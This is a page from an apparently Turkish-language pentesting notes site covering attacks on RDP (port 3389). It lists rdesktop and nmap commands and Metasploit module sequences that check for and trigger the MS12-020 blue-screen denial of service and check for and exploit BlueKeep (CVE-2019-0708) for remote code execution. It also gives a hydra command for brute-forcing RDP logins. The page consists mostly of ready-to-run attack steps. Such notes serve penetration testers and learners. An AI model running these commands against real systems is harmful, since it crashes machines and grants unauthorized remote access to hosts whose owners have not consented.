Tufan Turhan
  • Introduction
  • Red Teaming
    • Initial Access
      • VoipHopper
      • SMB – SCF File Attacks
      • MITM6
      • LLMNR, NBT-NS, mDNS Zehirlemeleri ve Relay Ataklar
    • Responder - DNS Injection
    • Privilege Escalation
      • PrintNightmare
      • Juicy Potato ile Windows Yetki Yükseltme
      • Token Impersonation with Incognito
    • Active Directory & Kerberos
      • Kerberos
      • Kerberosting
      • AS-REP Roasting
      • Overpass The Hash/Pass The Key (PTK)
      • DCSync Attack
      • DCShadow Attack
      • GETTGT
      • Golden Tickets
      • Silver Tickets
      • PowerView
      • MS14-025 (GPP Abusing)
      • BloodHound
      • Procdump
    • Lateral Movement
      • RDP MiTM-Hijacking
      • Vlan Hopping
      • Pivoting
    • Network Pentest
      • IPv4 Subnet Cheat Sheet
      • DNS Spoofing
      • DHCP Rogue
    • Shell to Meterpreter
    • Turn Off or Bypass AV
    • Useful CMD or Powershell Command
    • Brute Force
    • Windows Dosya İndirme
    • Windows UAC Bypass
    • Insecure Dosya İzni
  • Pentesting
    • Pentesting FTP - 21
    • Pentesting SMTP - 25,465,587
    • Pentesting SMB - 139 & 445
    • Pentesting Telnet - 23
    • Pentesting DNS - 53
    • Pentesting MSRPC -135
    • Pentesting SNMP - 161,162
    • Pentesting LDAP - 389,636
    • Pentesting MSSQL - 1433
    • Pentesting MYSQL - 3306
    • Pentesting RDP - 3389
    • Pentesing WINRM 5985,5986
  • Web Application
    • 2FA/OTP Bypass
    • Captcha Bypass
    • Cache Poisoning
    • Command Injection (OS)
    • CRLF Injection
    • Cross-site WebSocket hijacking (CSWSH) -
    • Cross-site request forgery (CSRF) -
    • Dangling Markup -
    • Path traversal
    • File Upload
    • Formula Injection (CSV Injection)
    • Login Bypass List
    • OAuth -
    • Open Redirect
    • Race Condition -
    • Registration - Password Reset & Takeover Vulnerabilities
    • SQL Injection
    • SSRF
  • Linux Privilege Escalation
    • PHP Wrapper
    • Simple Http
    • Editing /etc/passwd
    • SUID Binaries
    • Sudo Rights
    • Otomatize Araçlar
    • OSCP Not
  • HTB
  • Reverse Shell w/Msfvenom
  • Upgrading Simple Shells to Fully Interactive TTYs
Powered by GitBook
On this page
  • Connect RDP
  • Nmap scripts
  • DoS Attack (MS12-020 Free DoS)
  • BlueKeep (CVE-2019-0708)
  • BruteForce RDP
  1. Pentesting

Pentesting RDP - 3389

Connect RDP

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>

Nmap scripts

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T

DoS Attack (MS12-020 Free DoS)

Genellikle Windows 7 makinalarda görülen bu zafiyet ilgili cihaz da mavi ekrana sebep olmaktadır. Metasploit da bu zafiyetin varlığını kontrol edebileceğimiz ve sömürebileceğimiz iki ayrı modül bulunmaktadır.

Tespit için:

use auxiliary/scanner/rdp/ms12_020_check
set rhosts file://root/desktop/ip_list
exploit

Sömürmek için:

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhosts 10.10.10.10
exploit

BlueKeep (CVE-2019-0708)

Bununda yine kontrol ve exploit modülleri mevcut.

Tespit için:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 10.10.10.10
exploit

Sömürmek için:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 10.10.10.10
set target 5
exploit
sysinfo

BruteForce RDP

hydra -L user.txt -P pass.txt 10.10.10.10 rdp

PreviousPentesting MYSQL - 3306NextPentesing WINRM 5985,5986

Last updated 3 years ago